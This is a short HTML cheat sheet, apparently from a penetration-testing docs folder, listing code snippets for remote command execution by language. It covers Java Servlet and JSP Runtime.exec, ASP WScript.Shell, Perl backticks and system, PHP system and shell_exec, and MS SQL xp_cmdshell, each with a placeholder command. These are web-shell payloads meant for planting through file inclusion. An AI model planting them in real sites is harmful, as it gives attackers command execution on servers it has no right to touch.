docs/attack-docs/rfi-cheatsheet.html
This table provides a handy list of techniques that can be used for remote command execution, by language.
|
| |
Web Application Environment
|
Source Code
|
Additional Information
| |
Java Servlet
|
class Example
extends HTTPServlet
{
.
.
.
void function()
{
Runtime r = Runtime.getRuntime();
Process p = r.exec("\<command\>",
\<arguments\>);
}
.
.
.
}
|
http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html
| |
Java Server Pages (JSP)
|
<%
Runtime r =
Runtime.getRuntime();
Process p =
r.exec("\<command\>",
\<arguments\>);
%>
|
http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html
| |
Active Server Pages (ASP)
|
If Windows Scripting Host
is installed on the target
system:
\<%
Set wsh =
Server.CreateObject("Wscript.shell")
wsh.run("\<command\>");
%>
|
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp
| |
PERL
|
In PERL, commands are executed by wrapping them with the backtick symbol (`)
$result = \<command\>;
or
system("<command>");
or
open(IN, "<command> |");
|
http://www.perldoc.com/perl5.6/pod/perlfunc.html
| |
PHP
|
<? system("<command>") ?>
or
<? shell_exec("<command>") ?>
|
http://www.php.net/manual/en/function.shell-exec.php
| |
MS SQL
|
EXEC master..xp_cmdshell" <command>"
|
|